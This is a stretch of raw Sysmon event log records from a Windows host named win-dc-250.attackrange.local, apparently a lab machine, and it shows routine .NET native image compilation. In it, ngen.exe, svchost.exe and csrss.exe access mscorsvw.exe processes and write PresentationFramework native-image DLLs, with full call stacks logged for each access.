13:22:00.415{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-2E02-000000009A01}980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:00.352{08A6967A-4578-6000-2D02-000000009A01}4108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\100c-0\PresentationFramework-SystemXml.dll2021-01-14 13:22:00.352 10341000x80000000000000006268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.290{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-2D02-000000009A01}4108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.274{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4578-6000-2D02-000000009A01}4108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.274{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-2D02-000000009A01}4108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.227{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-2C02-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.227{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4578-6000-2C02-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.227{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-2C02-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:00.165{08A6967A-4578-6000-2B02-000000009A01}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bec-0\PresentationFramework-SystemDrawing.dll2021-01-14 13:22:00.165 10341000x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.118{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-2B02-000000009A01}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.102{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4578-6000-2B02-000000009A01}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.102{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-2B02-000000009A01}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.055{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4578-6000-2A02-000000009A01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.040{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4578-6000-2A02-000000009A01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:00.040{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4578-6000-2A02-000000009A01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.962{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4579-6000-3702-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.946{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4579-6000-3702-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.946{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4579-6000-3702-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.884{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4579-6000-3602-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.884{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4579-6000-3602-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.884{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4579-6000-3602-000000009A01}2992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:01.821{08A6967A-4579-6000-3502-000000009A01}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c14-0\PresentationFramework.Classic.dll2021-01-14 13:22:01.821 10341000x80000000000000006296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.587{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4579-6000-3502-000000009A01}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.571{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4579-6000-3502-000000009A01}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.571{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4579-6000-3502-000000009A01}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.493{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4579-6000-3402-000000009A01}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.493{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4579-6000-3402-000000009A01}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:01.493{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4579-6000-3402-000000009A01}4428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscor